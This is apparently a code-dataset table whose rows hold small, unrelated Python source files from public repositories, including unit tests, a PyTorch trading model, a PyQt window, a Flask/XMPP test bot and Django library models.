max_stars_repo_path
stringlengths 4
182
| max_stars_repo_name
stringlengths 6
116
| max_stars_count
int64 0
191k
| id
stringlengths 7
7
| content
stringlengths 100
10k
| size
int64 100
10k
|
---|---|---|---|---|---|
tests/test_stock.py
|
HeavensGold/stonky
| 3 |
2022758
|
from stonky.stock import Stock
def test_post_init():
    """Ticker symbol and currency code are upper-cased after init."""
    stock = Stock(ticket="amd", currency_code="usd")
    assert (stock.ticket, stock.currency_code) == ("AMD", "USD")
def test_volume_str__hundreds__lower():
    # Values below 1K are rendered with two decimals and no suffix.
    stock = Stock(volume=0)
    assert stock.volume_str == "0.00"


def test_volume_str__hundreds__upper():
    stock = Stock(volume=999.99)
    assert stock.volume_str == "999.99"


def test_volume_str__thousands__lower():
    # From 1K upwards the value is abbreviated with a magnitude suffix.
    stock = Stock(volume=1_000)
    assert stock.volume_str == "1K"


def test_volume_str__thousands__upper():
    stock = Stock(volume=999_999)
    assert stock.volume_str == "999.9K"


def test_volume_str__millions__lower():
    stock = Stock(volume=1_000_000)
    assert stock.volume_str == "1M"


def test_volume_str__millions__upper():
    stock = Stock(volume=999_999_999)
    assert stock.volume_str == "999.9M"
def test_volume_str__billions__lower():
    # Fixed typo in the test name: "voume" -> "volume", matching the
    # naming convention of every other volume_str test in this module.
    stock = Stock(volume=1_000_000_000)
    assert stock.volume_str == "1B"


def test_volume_str__billions__upper():
    stock = Stock(volume=999_999_999_999)
    assert stock.volume_str == "999.9B"
def test_colour__red():
    # A negative day change renders red.
    stock = Stock(delta_amount=-100)
    assert stock.colour == "red"


def test_colour__yellow():
    # A flat day change renders yellow.
    stock = Stock(delta_amount=0)
    assert stock.colour == "yellow"


def test_colour__green():
    # A positive day change renders green.
    stock = Stock(delta_amount=100)
    assert stock.colour == "green"
def test_ticker_tape__down():
    # Falling price uses the ▼ marker; amounts are rounded to 2 decimals.
    stock = Stock(
        ticket="AMD",
        delta_amount=-10.123,
        delta_percent=0.156,
        volume=100.123,
        amount_bid=200.553,
    )
    assert stock.ticker_tape == "AMD 100.12 @ 200.55 ▼ -10.12 +15.60%"


def test_ticker_tape__zero():
    # A flat price uses the ▬ marker and an explicit +0.00 delta.
    stock = Stock(
        ticket="AMD",
        delta_amount=0.0,
        delta_percent=0.156,
        volume=100.123,
        amount_bid=200.553,
    )
    assert stock.ticker_tape == "AMD 100.12 @ 200.55 ▬ +0.00 +15.60%"


def test_ticker_tape_up():
    # A rising price uses the ▲ marker.
    stock = Stock(
        ticket="AMD",
        delta_amount=10.123,
        delta_percent=0.156,
        volume=100.123,
        amount_bid=200.553,
    )
    assert stock.ticker_tape == "AMD 100.12 @ 200.55 ▲ +10.12 +15.60%"
def test_position():
    # Position line: ticker, signed amount, signed percentage.
    stock = Stock(ticket="AAPL", delta_amount=12.345, delta_percent=0.0678)
    assert stock.position == "AAPL +12.35 +6.78%"


def test_profit_and_loss():
    # P&L line: signed percentage, signed amount, then the currency code
    # (the expected "USD" here implies USD is the default currency).
    stock = Stock(delta_amount=12.345, delta_percent=0.0678)
    assert stock.profit_and_loss == "+6.78% +12.35 USD"
| 2,493 |
misc/RL/model.py
|
deecamp-chuangxin/DeepInvest
| 1 |
2023761
|
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
class DRL(nn.Module):
    # Direct Reinforcement model to learn trading policy
    # Using shallow rnn to get policy
    def __init__(self,config):
        """Build the policy network (GRU or MLP head) and its optimizer.

        NOTE(review): ``config`` is accepted but never read — every
        hyper-parameter below is hard-coded. Presumably it was meant to
        drive these settings; confirm against the training script.
        """
        super(DRL,self).__init__()
        self.lr = 0.001  # original learning rate of 0.00001 felt too low, changed to 0.001
        self.epoch = 5
        self.more_train = False
        self.load_model = 'DDR30_4'
        self.save_model = 'DDR30'
        self.objective_type = 'TP'
        self.model_type = 'MLP'
        self.MLP_layer = 2
        self.noise_level = 2
        self.truncate_step = 5
        self.lamda = 0.01  # EMA decay used in GetSharpeRatio
        self.cost_rate = 0.0003  # HK stock trading fees can run as high as 0.31%-0.36%
        self.input_size = 45
        self.hidden_size = 30
        if self.model_type == 'RNN':
            #self.RNN_cell = nn.RNNCell(self.input_size+5,self.hidden_size)
            self.GRU_cell = nn.GRUCell(self.input_size+5,self.hidden_size)
            self.RNN_Linear = nn.Linear(self.hidden_size,1)
        else:
            if self.MLP_layer == 1:
                self.MLPOnly = nn.Linear(self.input_size+5,1)
            else:
                self.MLP_Linear1 = nn.Linear(self.input_size+5,self.hidden_size)
                self.MLP_Linear2 = nn.Linear(self.hidden_size,1)
        #self.Policy_u = nn.Linear(1,1,bias=False)
        # Learned scalar weighting the previous position in the policy bias.
        self.Policy_u = nn.Parameter(torch.rand(1))
        self.optimizer = optim.Adam(self.parameters(),lr=self.lr)  # self.parameters() comes from the parent class; lr is the learning rate
        for param in self.parameters():
            print(param.data.shape)

    def GetPolicy_RNN(self,Rt,Ht_1,Ft_1):
        """Map a return window to a discretised policy via the GRU head.

        Returns ``(Ft, Ht)``: the new policy value and hidden state.

        NOTE(review): ``self.trading_reg`` is never assigned anywhere in
        this class, so this method would raise AttributeError as written;
        confirm whether ``self.Policy_u`` was intended (as in the MLP path).
        """
        # Does not explicitly using Ft_1
        # Using Hidden state Ht_1 instead
        Ft_1 = Variable(Ft_1).cuda()
        Policy_bias = self.trading_reg * Ft_1
        input_t = Rt.unsqueeze(0)
        Ht = self.GRU_cell(input_t,Ht_1)
        H = F.tanh(self.RNN_Linear(Ht).squeeze()+Policy_bias)
        #H = F.tanh(self.RNN_Linear(Ht).squeeze())
        value = H.data[0]
        # Short position
        if value <= -0.25:
            strategy = -1
        # Long position
        elif value >= 0.25:
            strategy = 1
        # Neutral
        else:
            strategy = 0
        # Snap the output to the discrete strategy value while keeping the
        # gradient path through H (straight-through-style adjustment).
        diff = value - strategy
        Ft = H - diff
        return Ft, Ht

    def GetPolicy_MLP(self,Ft_1,Rt,noise):
        """Compute the current policy from features Rt and previous policy
        Ft_1 using the MLP head.

        NOTE(review): ``noise`` is accepted but never used here.
        """
        # Rt [Rt_m,...,Rt_1]
        if self.MLP_layer ==1:
            H = self.MLPOnly(Rt)
        else:
            H1 = F.sigmoid(self.MLP_Linear1(Rt))
            H = self.MLP_Linear2(H1)
        #Policy_bias = self.trading_reg * Ft_1
        Policy_bias = self.Policy_u*Ft_1
        out = F.tanh(H+Policy_bias)
        value = out.data[0]
        # Short position
        if value <= -0.25:
            strategy = -1
        # Long position
        elif value >= 0.25:
            strategy = 1
        # Neutral
        else:
            strategy = 0
        # Snap to the discrete strategy while keeping gradients through out.
        diff = value - strategy
        Ft = out - diff
        return Ft

    def CheckStateChange(self,policies):
        """Return 1 if the position changed between steps, else 0."""
        Ft_1, Ft = policies
        if Ft_1.data[0] == Ft.data[0]:
            return 0
        else:
            return 1

    def GetCostAmount(self,policies):
        """Traded amount |Ft - Ft_1|, later scaled by the cost rate."""
        Ft_1, Ft = policies
        amount = torch.abs(Ft-Ft_1)
        #print(Ft.data[0],Ft_1.data[0],amount.data[0])
        return amount

    def GetPriceChange(self,price_data):
        """First difference of the price series: P_t - P_{t-1}."""
        Pt = price_data[1:]
        Pt_1 = price_data[:-1]
        revenue = Pt - Pt_1
        return revenue

    def GetMomentum(self,price_data,momentum_days):
        """Momentum features: last price minus each average in
        ``momentum_days``, plus last price minus first price."""
        Pt = price_data[-1]
        Momentum = []
        for avg in momentum_days:
            Momentum.append(Pt-avg)
        Momentum.append(Pt-price_data[0])
        return torch.FloatTensor(Momentum)

    def GetSharpeRatio(self,Rt,At_1,Bt_1):
        """One incremental (differential) Sharpe-ratio update.

        Rt is the current return; At_1/Bt_1 are exponential moving averages
        of the first and second moments. Returns ``(Dt, At, Bt)`` where At
        and Bt are detached from the graph via ``Variable(...).cuda()``.
        """
        #print(Rt.data[0],At_1.data[0],Bt_1.data[0])
        At = At_1 + self.lamda * (Rt - At_1)
        Bt = Bt_1 + self.lamda * (Rt**2 - Bt_1)
        first_term = Bt_1 * (Rt-At_1)
        second_term = (At_1 * (Rt**2 - Bt_1)) / 2
        # NOTE(review): despite its name this is the *denominator*
        # (Bt_1 - At_1^2)^(3/2); zero variance is handled below.
        numerator = (Bt_1 - At_1**2) ** (3/2)
        if numerator.data[0] != 0:
            Dt = (first_term - second_term) / numerator
        else:
            Dt = Variable(torch.zeros(1)).cuda()
        #devDt = (Bt_1 - At_1*Rt) / (Bt_1 - At_1**2)**(3/2)
        return Dt, Variable(At.data).cuda(), Variable(Bt.data).cuda()
| 4,557 |
MainWin1.py
|
zhuxuanhe/Qt5uid
| 2 |
2022628
|
import sys
from PyQt5.QtWidgets import QMainWindow,QApplication,QDesktopWidget
from PyQt5.QtGui import QIcon
class FirstMainWin(QMainWindow):
    """Main window that shows a transient status message and opens centred."""

    def __init__(self, parent=None):
        super(FirstMainWin, self).__init__(parent)
        # Window title and initial size.
        self.setWindowTitle('标题')
        self.resize(400, 300)
        # Status-bar message shown for 5 seconds.
        self.status = self.statusBar()
        self.status.showMessage('xiaoxi', 5000)
        self.center()

    def center(self):
        """Move the window to the middle of the primary screen."""
        screen_rect = QDesktopWidget().screenGeometry()
        frame_rect = self.geometry()
        left = int((screen_rect.width() - frame_rect.width()) / 2)
        top = int((screen_rect.height() - frame_rect.height()) / 2)
        self.move(left, top)
if __name__ == '__main__':
    # Qt bootstrap: create the application, set the window icon, show the
    # main window and hand control to the Qt event loop.
    app = QApplication(sys.argv)
    app.setWindowIcon(QIcon('./img/favicon.ico'))
    main = FirstMainWin()
    main.show()
    sys.exit(app.exec_())
| 863 |
Codewars/Test/Greet_me_test.py
|
maxcohen31/A-bored-math-student
| 0 |
2023219
|
import unittest
from Greet_me_7_kyu import greet
class Greet(unittest.TestCase):
    """Tests for the 7 kyu ``greet`` kata solution."""

    def test_1(self):
        cases = (
            ['VALERIE', 'Hello Valerie!'],
            ['krissy', 'Hello Krissy!'],
            ['Brian', 'Hello Brian!'],
        )
        for name, expected in cases:
            self.assertEqual(greet(name), expected)
if __name__ == "__main__":
    # Run the test suite when this file is executed directly.
    unittest.main()
| 469 |
gchatautorespond/lib/chatworker/testworker.py
|
merrlyne/gchatautorespond
| 0 |
2023048
|
import httplib
import logging
from flask import Flask
import httplib2
from oauth2client.client import AccessTokenRefreshError
from .bot import MessageBot
logger = logging.getLogger(__name__)
app = Flask(__name__)
@app.route('/message/<email>', methods=['POST'])
def message(email):
    """Trigger the configured worker to send its test message to *email*.

    Returns an empty 204 No Content response. (Python 2: ``httplib``.)
    """
    app.config['worker'].send_to(email)
    return ('', httplib.NO_CONTENT)
class TestWorker(object):
    """A TestWorker runs a bot that can send messages to other bots."""

    # Canned message body delivered by send_to().
    message = ('Hello! This is your Autoresponder test message.'
               '\nIf you did not request one, email <EMAIL> for help.')

    def __init__(self, raw_credentials):
        # OAuth2 credentials object; refreshed in _bot_failed_auth.
        self.raw_credentials = raw_credentials

    def start(self):
        """Create the bot, wire auth-failure handling, connect and process."""
        self.bot = MessageBot(self.raw_credentials.id_token['email'], self.raw_credentials.access_token)
        failed_auth_callback = self._bot_failed_auth
        self.bot.add_event_handler('failed_auth', failed_auth_callback)
        self.bot.connect()
        # block=False: processing continues in the background.
        self.bot.process(block=False)

    def stop(self):
        """Disconnect immediately, without waiting or sending a close."""
        self.bot.disconnect(wait=False, send_close=False)

    def send_to(self, address):
        """Send the canned test message to *address*."""
        logger.info("sending to %r", address)
        self.bot.send_to(address, self.message)

    def _bot_failed_auth(self, event):
        """Handle two cases:

        * expired auth -> attempt to refresh
        * revoked auth -> remove the credentials
        """
        self.stop()
        try:
            logger.info("refreshing test bot credentials")
            self.raw_credentials.refresh(httplib2.Http())
        except AccessTokenRefreshError:
            # Refresh rejected: credentials were most likely revoked.
            logger.error("test bot credentials revoked?")
        else:
            logger.info("test bot credentials refreshed")
            self.start()
| 1,738 |
helpers/init_console.py
|
codegods/blo
| 7 |
2023718
|
import os
import sys
from platform import system
# Repository root: one level up when imported from a known project
# sub-directory, otherwise the current directory itself.
# FIX: use os.path.basename instead of splitting the absolute path on "/",
# which never matched on Windows (backslash separators) — ironic, since
# this module exists to support Windows consoles.
PROJECT_ROOT = os.path.abspath(
    ".."
    if os.path.basename(os.path.abspath("."))
    in ["lib", "api", "helpers", "scripts", "tests", "extensions", "docs", "frontend"]
    else "."
)
def _win_init() -> None:
    """
    Imports and initialises the ANSI(32|64).dll depending upon the
    system kind. Also frees the dll when exiting.
    """
    import ctypes
    from ctypes import wintypes
    import atexit

    kernel32 = ctypes.windll.kernel32
    kernel32.FreeLibrary.argtypes = (wintypes.HANDLE,)
    kernel32.FreeLibrary.restype = wintypes.BOOL
    # Pick the DLL matching the interpreter's pointer width.
    # FIX: the check previously read ``2 ^ 31`` which is XOR (== 29), so it
    # was always true and the 64-bit DLL was always chosen; ``2 ** 31`` is
    # the intended power-of-two threshold for a 64-bit interpreter.
    path_to_dll = os.path.join(PROJECT_ROOT, "helpers", "ANSI32.dll")
    if sys.maxsize > 2 ** 31:
        path_to_dll = os.path.join(PROJECT_ROOT, "helpers", "ANSI64.dll")
    # Loads the dll
    dll = ctypes.WinDLL(path_to_dll, use_last_error=True)

    def _win_exit():
        """Frees the dll"""
        if not kernel32.FreeLibrary(dll._handle):
            raise ctypes.WinError(ctypes.get_last_error())

    atexit.register(_win_exit)
def init() -> None:
    """
    Initialises the ANSICON dll on windows systems and
    does absolutely nothing on other platforms.
    It helps us use ANSI sequences without any external libraries.
    """
    # Guard clause: nothing to do unless we are on Windows.
    if system().lower() != "windows":
        return
    _win_init()
| 1,407 |
tests/conftest.py
|
skriems/cherrypy-recipes
| 0 |
2023377
|
import pytest
from db.server import start_postgres
@pytest.fixture(scope='session', autouse=True)
def pg_instance():
    """Session-wide Postgres instance; skips the run if it cannot start.

    Yields the object returned by ``start_postgres`` and destroys it on
    teardown. NOTE(review): the ``except`` also wraps the ``yield``, so an
    exception propagating back through the yield would be reported as
    "Postgres not available" — confirm that is intended.
    """
    instance = None
    try:
        instance = start_postgres()
        yield instance
    except Exception as err:
        # ``err`` is interpolated into the message via **locals().
        pytest.skip("Postgres not available ({err})".format(**locals()))
    if instance:
        instance.destroy()
| 353 |
affinity_search/outputsql.py
|
RMeli/gninascripts
| 18 |
2023817
|
#!/usr/bin/env python
'''
Output the parameters that makemodel supports with their ranges
'''
import makemodel
import json, sys
from collections import OrderedDict
#extract from arguments to makemodel
opts = makemodel.getoptions()

create = 'CREATE TABLE params (rmse DOUBLE, top DOUBLE, R DOUBLE, auc DOUBLE'
#everything else make a string
# FIX: only the option names are used here — the previous loop unpacked
# the (name, vals) pairs and never read vals.
for name in sorted(opts):
    create += ', %s VARCHAR(32)' % name
create += ');'
print(create)
| 454 |
backend/quality_report.py
|
ICTU/quality-report
| 25 |
2024478
|
#!/usr/bin/env python
"""
Copyright 2012-2019 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Python script to retrieve metrics from different back-end systems, like Sonar and Jenkins.
import logging
import pathlib
import sys
from typing import cast
import pygal
import pkg_resources
from hqlib import app, formatting, commandlineargs, report, metric_source, log, filesystem, configuration, \
NAME, VERSION
class Reporter(): # pylint: disable=too-few-public-methods
    """ Class for creating the quality report for a specific project. """

    def __init__(self, project_folder_or_filename):
        self.__project = configuration.project(project_folder_or_filename)

    def create_report(self, report_folder, create_frontend: bool = True):
        """ Create, format, and write the quality report. """
        quality_report = report.QualityReport(self.__project)
        # Let every configured history metric source record this report run.
        for history in self.__project.metric_sources(metric_source.History):
            history = cast(metric_source.History, history)
            if history.filename():
                history.add_report(quality_report)
        self.__create_report(quality_report, report_folder, create_frontend)
        return quality_report

    @classmethod
    def __create_report(cls, quality_report, report_dir, create_resources: bool = True):
        """ Format the quality report to HTML and write the files in the report folder. """
        report_dir = pathlib.Path(report_dir or '.').resolve()
        filesystem.create_dir(report_dir)
        filesystem.create_dir(report_dir / 'json')
        if create_resources:
            cls.__create_resources(report_dir)
        # One JSON document per formatter: current metrics, meta-metric
        # history, and report meta data.
        json_files = dict(metrics=formatting.MetricsFormatter,
                          meta_history=formatting.MetaMetricsHistoryFormatter,
                          meta_data=formatting.MetaDataJSONFormatter)
        for filename, formatter in json_files.items():
            cls.__create_json_file(quality_report, report_dir, formatter, filename)
        cls.__create_trend_images(quality_report, report_dir)

    @classmethod
    def __create_json_file(cls, quality_report, report_dir, formatter, filename):
        """ Create the JSON file using the JSON formatter specified. """
        json_filename = report_dir / 'json' / '{0}.json'.format(filename)
        cls.__format_and_write_report(quality_report, formatter, json_filename, 'w', 'utf-8')

    @staticmethod
    def __create_resources(report_dir):
        """ Create and write the resources. """
        resource_manager = pkg_resources.ResourceManager()
        resource_module = app.__name__
        # 'html' resources land in the report root; types with encoding None
        # are copied verbatim as bytes.
        for resource_type, encoding in (('img', None), ('dist', None), ('html', 'utf-8')):
            resource_dir = (report_dir / resource_type) if resource_type != 'html' else report_dir
            filesystem.create_dir(resource_dir)
            for resource in resource_manager.resource_listdir(resource_module, resource_type):
                filename = resource_dir / resource
                contents = resource_manager.resource_string(resource_module, resource_type + '/' + resource)
                mode = 'w' if encoding else 'wb'
                contents = contents.decode(encoding) if encoding else contents
                filesystem.write_file(contents, filename, mode, encoding)

    @classmethod
    def __create_trend_images(cls, quality_report, report_dir):
        """ Retrieve and write the trend images. """
        style = pygal.style.Style(background='transparent', plot_background='transparent')
        dates = ''
        filesystem.create_dir(report_dir / 'chart')
        for metric in quality_report.metrics():
            # Sparkline SVG of the metric's recent history.
            line_chart = pygal.Line(style=style, range=metric.y_axis_range())
            line_chart.add('', metric.recent_history(), stroke_style={'width': 2})
            image = line_chart.render_sparkline()
            filename = report_dir / 'chart' / '{0!s}.svg'.format(metric.id_string())
            filesystem.write_file(image, filename, mode='wb', encoding=None)
            cls.__save_metric_long_history(metric, report_dir)
            # The date labels are captured once, from the first metric.
            if not dates:
                dates = metric.get_long_history_dates()
        filename = report_dir / 'json' / 'dates.txt'
        filesystem.write_file(dates, filename, mode='w', encoding=None)

    @classmethod
    def __save_metric_long_history(cls, metric, report_dir):
        # Long history serialised as a comma-separated line; None -> ''.
        filename = report_dir / 'json' / '{stable_id}.txt'.format(stable_id=metric.normalized_stable_id())
        filesystem.write_file(",".join(str(i) if i is not None else '' for i in metric.long_history()),
                              filename, mode='w', encoding=None)

    @staticmethod
    def __format_and_write_report(quality_report, report_formatter, filename, mode, encoding, **kwargs):
        """ Format the report using the formatter and write it to the specified file. """
        formatted_report = report_formatter(**kwargs).process(quality_report)
        filesystem.write_file(formatted_report, filename, mode, encoding)
if __name__ == '__main__':
    # pylint: disable=invalid-name
    args = commandlineargs.parse()
    log.init_logging(args.log)
    logging.info("%s v%s starting quality report", NAME, VERSION)
    report = Reporter(args.project).create_report(args.report, args.frontend != 'no')
    logging.info("%s v%s done with quality report", NAME, VERSION)
    # Exit code 2 signals "direct action needed" when requested via CLI.
    sys.exit(2 if args.failure_exit_code and report.direct_action_needed() else 0)
| 5,925 |
google_maps_reviews/utils.py
|
outscraper/google-maps-reviews
| 2 |
2023867
|
def as_list(value):
    """Return *value* unchanged if it is a list, else wrap it in one."""
    return value if isinstance(value, list) else [value]
| 106 |
pyflu/encoding.py
|
flupke/pyflu
| 1 |
2022939
|
"""
Charset encoding utilities.
"""
import sys
def to_fs_encoding(value):
    """
    Convert an unicode value to a str in the filesystem encoding.

    Raises TypeError for non-unicode input. (Python 2 only: relies on
    the ``unicode`` builtin, which does not exist on Python 3.)
    """
    if not isinstance(value, unicode):
        raise TypeError("expected a unicode value")
    return value.encode(sys.getfilesystemencoding())
def from_fs_encoding(value):
    """
    Convert a str value to an unicode object from the filesystem encoding.

    Raises TypeError for non-str input. (Python 2 only: ``str.decode``
    does not exist on Python 3.)
    """
    if not isinstance(value, str):
        raise TypeError("expected a str value")
    return value.decode(sys.getfilesystemencoding())
| 561 |
toolManager.py
|
benjamincongdon/adept
| 14 |
2023890
|
class ToolManager(object):
    """Class-level (global) tool state: which function and effect tools are
    selected, plus the buttons that display the selection.

    NOTE(review): the BUTTON_* attributes are attached by
    ``initialize_states``; calling the setters before it runs raises
    AttributeError.
    """
    # DEFINE CONSTANTS
    # ONLY ONE FUNC STATE CAN BE SELECTED AT A TIME
    FUNC_FILL = 1
    FUNC_SELECT = 2
    # ONLY ONE EFFECT STATE CAN BE SELECTED AT A TIME
    EFFECT_DRAW = 1
    EFFECT_AREA = 2

    # Currently selected states, shared class-wide.
    func_state = None
    effect_state = None

    @staticmethod
    def verify_state(func_state, effect_state):
        # Both states must be one of the constants defined above.
        assert(
            func_state == ToolManager.FUNC_FILL or \
            func_state == ToolManager.FUNC_SELECT
        )
        assert(
            effect_state == ToolManager.EFFECT_DRAW or \
            effect_state == ToolManager.EFFECT_AREA
        )

    @staticmethod
    def set_func_state(other_state):
        """Select a function tool and repaint both function buttons."""
        ToolManager.verify_state(other_state, ToolManager.effect_state)
        ToolManager.func_state = other_state
        if ToolManager.func_state == ToolManager.FUNC_FILL:
            # Highlight FILL, restore SELECT to its normal background.
            ToolManager.BUTTON_FUNC_FILL.bg_color = ToolManager.BUTTON_FUNC_FILL_SEL_COLOR
            ToolManager.BUTTON_FUNC_FILL.render()
            ToolManager.BUTTON_FUNC_SELECT.bg_color = ToolManager.BUTTON_FUNC_SELECT_BG_COLOR
            ToolManager.BUTTON_FUNC_SELECT.render()
        elif ToolManager.func_state == ToolManager.FUNC_SELECT:
            # Highlight SELECT, restore FILL to its normal background.
            ToolManager.BUTTON_FUNC_SELECT.bg_color = ToolManager.BUTTON_FUNC_SELECT_SEL_COLOR
            ToolManager.BUTTON_FUNC_SELECT.render()
            ToolManager.BUTTON_FUNC_FILL.bg_color = ToolManager.BUTTON_FUNC_FILL_BG_COLOR
            ToolManager.BUTTON_FUNC_FILL.render()

    @staticmethod
    def set_effect_state(other_state):
        """Select an effect tool and repaint both effect buttons."""
        ToolManager.verify_state(ToolManager.func_state, other_state)
        ToolManager.effect_state = other_state
        if ToolManager.effect_state == ToolManager.EFFECT_AREA:
            # Highlight AREA, restore DRAW to its normal background.
            ToolManager.BUTTON_EFFECT_AREA.bg_color = ToolManager.BUTTON_EFFECT_AREA_SEL_COLOR
            ToolManager.BUTTON_EFFECT_AREA.render()
            ToolManager.BUTTON_EFFECT_DRAW.bg_color = ToolManager.BUTTON_EFFECT_DRAW_BG_COLOR
            ToolManager.BUTTON_EFFECT_DRAW.render()
        elif ToolManager.effect_state == ToolManager.EFFECT_DRAW:
            # Highlight DRAW, restore AREA to its normal background.
            ToolManager.BUTTON_EFFECT_DRAW.bg_color = ToolManager.BUTTON_EFFECT_DRAW_SEL_COLOR
            ToolManager.BUTTON_EFFECT_DRAW.render()
            ToolManager.BUTTON_EFFECT_AREA.bg_color = ToolManager.BUTTON_EFFECT_AREA_BG_COLOR
            ToolManager.BUTTON_EFFECT_AREA.render()

    @staticmethod
    def initialize_states(func_state, effect_state, buttons):
        """Bind the four tool buttons, remember their normal and selected
        colours, then apply the initial states.

        ``buttons`` must be a 4-tuple: (fill, select, draw, area).
        """
        assert(type(buttons) == tuple and len(buttons) == 4)
        ToolManager.BUTTON_FUNC_FILL = buttons[0]
        ToolManager.BUTTON_FUNC_FILL_BG_COLOR = ToolManager.BUTTON_FUNC_FILL.bg_color
        ToolManager.BUTTON_FUNC_FILL_SEL_COLOR = ToolManager.BUTTON_FUNC_FILL.sel_color
        ToolManager.BUTTON_FUNC_SELECT = buttons[1]
        ToolManager.BUTTON_FUNC_SELECT_BG_COLOR = ToolManager.BUTTON_FUNC_SELECT.bg_color
        ToolManager.BUTTON_FUNC_SELECT_SEL_COLOR = ToolManager.BUTTON_FUNC_SELECT.sel_color
        ToolManager.BUTTON_EFFECT_DRAW = buttons[2]
        ToolManager.BUTTON_EFFECT_DRAW_BG_COLOR = ToolManager.BUTTON_EFFECT_DRAW.bg_color
        ToolManager.BUTTON_EFFECT_DRAW_SEL_COLOR = ToolManager.BUTTON_EFFECT_DRAW.sel_color
        ToolManager.BUTTON_EFFECT_AREA = buttons[3]
        ToolManager.BUTTON_EFFECT_AREA_BG_COLOR = ToolManager.BUTTON_EFFECT_AREA.bg_color
        ToolManager.BUTTON_EFFECT_AREA_SEL_COLOR = ToolManager.BUTTON_EFFECT_AREA.sel_color
        ToolManager.verify_state(func_state, effect_state)
        ToolManager.func_state = func_state
        ToolManager.effect_state = effect_state
        ToolManager.set_func_state(ToolManager.func_state)
        ToolManager.set_effect_state(ToolManager.effect_state)
| 3,728 |
gnosis/eth/django/tests/test_forms.py
|
titandac/gnosis-py
| 64 |
2023332
|
from django.forms import forms
from django.test import TestCase
from web3 import Web3
from ..filters import EthereumAddressFieldForm, Keccak256FieldForm
class EthereumAddressForm(forms.Form):
    # Minimal form exposing the field under test.
    value = EthereumAddressFieldForm()


class Keccak256Form(forms.Form):
    # Minimal form exposing the field under test.
    value = Keccak256FieldForm()
class TestForms(TestCase):
    def test_ethereum_address_field_form(self):
        # Not hex at all -> invalid.
        form = EthereumAddressForm(data={"value": "not a ethereum address"})
        self.assertFalse(form.is_valid())
        self.assertEqual(
            form.errors["value"], ["Enter a valid checksummed Ethereum Address."]
        )
        # All-lowercase address -> checksum validation fails.
        form = EthereumAddressForm(
            data={"value": "0xbaa7df320f385318fe3409cc95db48de60dfa033"}
        )
        self.assertFalse(form.is_valid())
        self.assertEqual(
            form.errors["value"], ["Enter a valid checksummed Ethereum Address."]
        )
        # Same address with the correct mixed-case checksum -> valid.
        form = EthereumAddressForm(
            data={"value": "0xbaa7df320f385318fE3409CC95Db48DE60dfA033"}
        )
        self.assertTrue(form.is_valid())

    def test_keccak256_field_form(self):
        # Not hex at all -> invalid.
        form = Keccak256Form(data={"value": "not a hash"})
        self.assertFalse(form.is_valid())
        self.assertEqual(
            form.errors["value"], ['"not a hash" is not a valid keccak256 hash.']
        )
        # Hex but too short: a keccak256 digest must be 32 bytes.
        form = Keccak256Form(data={"value": "0x1234"})
        self.assertFalse(form.is_valid())
        self.assertEqual(
            form.errors["value"], ['"0x1234" keccak256 hash should be 32 bytes.']
        )
        # A real keccak256 digest validates.
        form = Keccak256Form(data={"value": Web3.keccak(text="testing").hex()})
        self.assertTrue(form.is_valid())
| 1,657 |
server/pubby/apps.py
|
lod-pubby/pubby-django
| 4 |
2023255
|
from django.apps import AppConfig
from pubby.config import init_config
class PubbyConfig(AppConfig):
    """Django app config for ``pubby``; loads its config once the app registry is ready."""
    name = 'pubby'

    def ready(self):
        # Called once by Django at startup.
        init_config()
| 166 |
PythonBaseDemo/classAndObjDemo/6.3/instance_access_classvar.py
|
CypHelp/TestNewWorldDemo
| 0 |
2024258
|
# coding: utf-8
#########################################################################
# 网站: <a href="http://www.crazyit.org">疯狂Java联盟</a> #
# author yeeku.H.lee <EMAIL> #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
class Record:
    """Demo class: instances resolve ``item``/``date`` through the class."""

    # Two class-level attributes shared by every instance.
    item = '鼠标'
    date = '2016-06-16'

    def info(self):
        """Print both class variables as seen from the instance."""
        for text in (self.item, self.date):
            print('info方法中: ', text)
rc = Record()
print(rc.item) # '鼠标'
print(rc.date) # '2016-06-16'
rc.info()
# Modify the two class variables on the Record class itself.
Record.item = '键盘'
Record.date = '2016-08-18'
# Call info() again — the instance now sees the updated class state.
rc.info()
| 1,369 |
library/models.py
|
VanshKachhwal/LMS
| 0 |
2022866
|
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.utils.timezone import now
class Book(models.Model):
    """A library book plus stock, popularity and rating bookkeeping."""
    # NOTE(review): AutoField is assigned as a class, not instantiated
    # (missing parentheses) — Django ignores this attribute and generates
    # the default ``id`` primary key instead. Confirm it can be removed.
    book_pk = models.AutoField
    book_title = models.CharField(max_length=50, default = "")
    book_author = models.CharField(max_length=50, default = "")
    book_publisher = models.CharField(max_length=50, default = "")
    genre = models.CharField(max_length=50, default="")
    # Number of copies currently available to borrow.
    availability = models.IntegerField(default=0)
    times_borrowed = models.IntegerField(default =0)
    summary = models.CharField(max_length=300)
    isbn = models.CharField(max_length = 30)
    image = models.ImageField(upload_to='images', default="")
    date_added = models.DateTimeField(default = now,editable = False)
    rating = models.DecimalField(default = 0, decimal_places=2, max_digits=5, editable =False)

    def __str__(self):
        return self.book_title

    def rent(self):
        """Consume one available copy and persist the change.

        NOTE(review): no lower bound — availability can go negative if
        called when no copies are left; confirm callers guard this.
        """
        self.availability-=1
        self.save()
class Request(models.Model):
    """A user's request to borrow (or renew) a book for ``Days`` days."""
    borrower_id = models.ForeignKey(User, on_delete = models.CASCADE)
    book_id = models.ForeignKey(Book, on_delete = models.CASCADE)
    Days = models.IntegerField()
    # True when the row represents a renewal of an existing loan.
    renew = models.BooleanField(default = False)

    def __str__(self):
        return self.borrower_id.username + "--" + self.book_id.book_title + "--" + str(self.Days)
class BookComment(models.Model):
    """A (possibly nested) user comment on a book."""
    sno= models.AutoField(primary_key=True)
    comment=models.TextField()
    user=models.ForeignKey(User, on_delete=models.CASCADE)
    book=models.ForeignKey(Book, on_delete=models.CASCADE)
    # Self-reference: NULL for top-level comments, set for replies.
    parent=models.ForeignKey('self',on_delete=models.CASCADE, null=True )
